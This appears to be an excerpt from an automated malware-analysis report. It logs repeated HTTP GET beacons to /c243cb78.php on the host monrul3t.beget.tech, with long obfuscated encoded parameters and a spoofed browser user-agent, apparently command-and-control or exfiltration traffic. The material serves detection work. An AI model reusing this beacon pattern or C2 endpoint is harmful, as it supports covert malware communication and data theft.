QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRz